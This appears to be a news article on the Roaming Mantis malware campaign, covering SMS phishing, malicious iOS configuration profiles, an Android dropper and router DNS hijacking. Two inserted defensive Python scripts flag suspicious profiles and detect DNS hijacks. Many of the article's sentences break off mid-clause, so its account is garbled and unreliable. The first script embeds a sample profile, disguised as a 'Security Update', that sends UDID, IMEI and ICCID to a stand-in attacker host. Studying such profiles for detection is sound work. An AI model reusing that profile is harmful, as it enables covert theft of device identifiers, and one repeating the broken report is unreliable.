Security experts at Kaspersky Lab reported that hundreds of users have been targeted with malware over the past month as part of a new campaign associated with the Roaming Mantis gang.
Roaming Mantis surfaced in March 2018 when hacked routers in Japan redirected users to compromised websites. An investigation by Kaspersky Lab indicated that the attack targeted users in Asia with fake websites customized for English, Korean, Simplified Chinese and Japanese. Most impacted users were in Bangladesh, Japan, and South Korea.
The latest wave of attacks aimed at spreading phishing links via SMS messages (SMiShing); most of the victims were users in Russia, Japan, India, Bangladesh, Kazakhstan, Azerbaijan, Iran,
Researchers detected Roaming Mantis-related malware over 6,800 times for more than 950 unique users in the period between February 25 and March 20, 2019.
Attackers used a new phishing method based on malicious mobile configurations, along with the previously observed DNS manipulation technique.
Unlike previous attacks, this time the Roaming Mantis attackers used a new landing page to target iOS devices in an attempt to trick victims into
The configuration causes the phishing site to open in a web browser and gathers information from the target's device.
“Our key finding is that the actor continues to seek ways to compromise
“After installation of this mobile config, the phishing site automatically opens in a web browser and collected information from the device is sent to the attacker’s server. This information includes DEVICE_PRODUCT, DEVICE_VERSION, UDID, ICCID, IMEI
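The behaviour described above (a profile that opens a page and posts device identifiers to a remote server) matches the shape of Apple's documented over-the-air "Profile Service" payload, which carries a `URL` and a `DeviceAttributes` list. The following triage script is an added example, not Kaspersky's tooling or anything from the report: it parses an unsigned XML `.mobileconfig`, lists which identifiers the profile asks for, and flags any collection URL whose host is not in an allowlist of expected enrollment servers. The sample profile, the hostnames and the allowlist are constructed for illustration; a signed profile would have to be unwrapped from its CMS envelope before being fed to this parser.

```python
import plistlib
from urllib.parse import urlparse

# Identifiers whose disclosure to an unknown server is the main concern.
SENSITIVE_ATTRIBUTES = {"UDID", "IMEI", "ICCID", "MEID", "SERIAL"}

# Constructed sample: an OTA "Profile Service" payload that asks the device to
# post its identifiers to a hypothetical, attacker-controlled hostname.
SAMPLE_MOBILECONFIG = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>PayloadContent</key>
  <dict>
    <key>URL</key>
    <string>https://profile-service.example.invalid/collect</string>
    <key>DeviceAttributes</key>
    <array>
      <string>UDID</string>
      <string>IMEI</string>
      <string>ICCID</string>
      <string>VERSION</string>
      <string>PRODUCT</string>
    </array>
  </dict>
  <key>PayloadType</key>
  <string>Profile Service</string>
  <key>PayloadIdentifier</key>
  <string>com.example.invalid.profile</string>
  <key>PayloadUUID</key>
  <string>00000000-0000-4000-8000-000000000001</string>
  <key>PayloadVersion</key>
  <integer>1</integer>
  <key>PayloadDisplayName</key>
  <string>Security Update</string>
</dict>
</plist>
"""


def _payloads(payload):
    """Yield a payload dict and any nested payloads held in a PayloadContent array."""
    yield payload
    content = payload.get("PayloadContent")
    if isinstance(content, list):
        for item in content:
            if isinstance(item, dict):
                yield from _payloads(item)


def triage_profile(raw: bytes, trusted_hosts: set) -> dict:
    """Summarise what an unsigned .mobileconfig asks for and where it sends it."""
    profile = plistlib.loads(raw)
    findings = {"identifiers_requested": [], "exfil_hosts": [], "web_clips": [], "verdict": "clean"}
    for p in _payloads(profile):
        ptype = p.get("PayloadType", "")
        content = p.get("PayloadContent")
        # Profile Service: device posts the listed attributes to URL.
        if ptype == "Profile Service" and isinstance(content, dict):
            findings["identifiers_requested"].extend(content.get("DeviceAttributes", []))
            host = urlparse(content.get("URL", "")).hostname or ""
            if host and host not in trusted_hosts:
                findings["exfil_hosts"].append(host)
        # Managed web clips put an icon on the home screen that opens a URL.
        if ptype == "com.apple.webClip.managed":
            findings["web_clips"].append(p.get("URL", ""))
    if findings["exfil_hosts"] and SENSITIVE_ATTRIBUTES & set(findings["identifiers_requested"]):
        findings["verdict"] = "suspicious: device identifiers posted to untrusted host"
    elif findings["exfil_hosts"] or findings["web_clips"]:
        findings["verdict"] = "review"
    return findings


if __name__ == "__main__":
    # The allowlist here is a constructed placeholder for an organisation's MDM host.
    result = triage_profile(SAMPLE_MOBILECONFIG, trusted_hosts={"mdm.corp.example"})
    for key, value in result.items():
        print(f"{key}: {value}")
```

The allowlist is the important knob: the same payload type is what a legitimate MDM enrollment uses, so the script treats the destination host, not the payload type, as the deciding factor. Run it over any profile a user was asked to install from an SMS or web link before deciding whether the identifiers it collects went somewhere they should not.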
“On the Android front, our telemetry data shows a new wave of malicious APK files which we detect as “Trojan-Dropper.AndroidOS.Wroba.g”.
In late February 2019, experts detected a URL query of a malicious DNS changer that attackers used to compromise router DNS settings. The attack works if the following conditions are met: no authentication for the router’s control panel from the
Experts at Kaspersky discovered that several hundred routers had been compromised in this way and that they all pointed to the rogue DNS IPs.
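A router whose DNS settings were changed by a DNS changer hands every client on the LAN a rogue resolver, so the simplest host-side check is to ask the router and a trusted resolver the same question and compare the answers. The script below is an added example, not Kaspersky's code: it builds a minimal DNS A query with only the standard library, parses the A records out of the reply, and reports domains for which the router's answer set shares nothing with the trusted resolver's. The resolver addresses, the domain list and the embedded sample response are constructed for illustration.

```python
import socket
import struct


def build_query(name: str, txid: int = 0x1234) -> bytes:
    """Build a minimal DNS A query (recursion desired) for `name`."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    labels = name.strip(".").split(".")
    qname = b"".join(bytes([len(label)]) + label.encode("ascii") for label in labels)
    return header + qname + b"\x00" + struct.pack(">HH", 1, 1)  # QTYPE=A, QCLASS=IN


def _skip_name(data: bytes, off: int) -> int:
    """Return the offset just past the name at `off`; a compression pointer is 2 bytes."""
    while True:
        length = data[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:
            return off + 2
        off += 1 + length


def parse_a_records(resp: bytes) -> list:
    """Extract the IPv4 addresses from the answer section of a DNS response."""
    _txid, _flags, qd, an, _ns, _ar = struct.unpack(">HHHHHH", resp[:12])
    off = 12
    for _ in range(qd):
        off = _skip_name(resp, off) + 4  # skip QTYPE and QCLASS
    ips = []
    for _ in range(an):
        off = _skip_name(resp, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", resp[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            ips.append(socket.inet_ntoa(resp[off:off + 4]))
        off += rdlen
    return ips


def query_a(resolver_ip: str, name: str, timeout: float = 3.0) -> list:
    """Send the query to `resolver_ip` on UDP/53 and return the A records it answers."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_query(name), (resolver_ip, 53))
        data, _ = sock.recvfrom(4096)
    return parse_a_records(data)


def find_hijacked(domains, router_ip, trusted_ip, query=query_a) -> dict:
    """Return domains whose answers from the router share no address with the
    trusted resolver's answers, a signal that the router's DNS was changed."""
    mismatches = {}
    for domain in domains:
        from_router = set(query(router_ip, domain))
        from_trusted = set(query(trusted_ip, domain))
        if from_router and not (from_router & from_trusted):
            mismatches[domain] = {"router": sorted(from_router), "trusted": sorted(from_trusted)}
    return mismatches


# Constructed sample response: one A record for example.com, name compressed
# with a pointer back to the question at offset 12.
SAMPLE_RESPONSE = (
    struct.pack(">HHHHHH", 0x1234, 0x8180, 1, 1, 0, 0)
    + b"\x07example\x03com\x00" + struct.pack(">HH", 1, 1)
    + b"\xc0\x0c" + struct.pack(">HHIH", 1, 1, 60, 4) + bytes([93, 184, 216, 34])
)

if __name__ == "__main__":
    # Addresses are placeholders; substitute the LAN gateway and a resolver you trust.
    print(find_hijacked(["example.com"], router_ip="192.0.2.1", trusted_ip="192.0.2.2"))
```

Treat a mismatch as a lead, not a verdict: CDN-fronted domains legitimately return different addresses from different resolvers, so pick domains with stable records, or confirm by reading the router's DNS settings directly. Because the comparison is injected through `query`, the logic can be exercised offline with canned answers.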
“We have seen
Kaspersky concludes: “We find the use of malicious mobile config especially alarming as this may cause serious problems for the users,”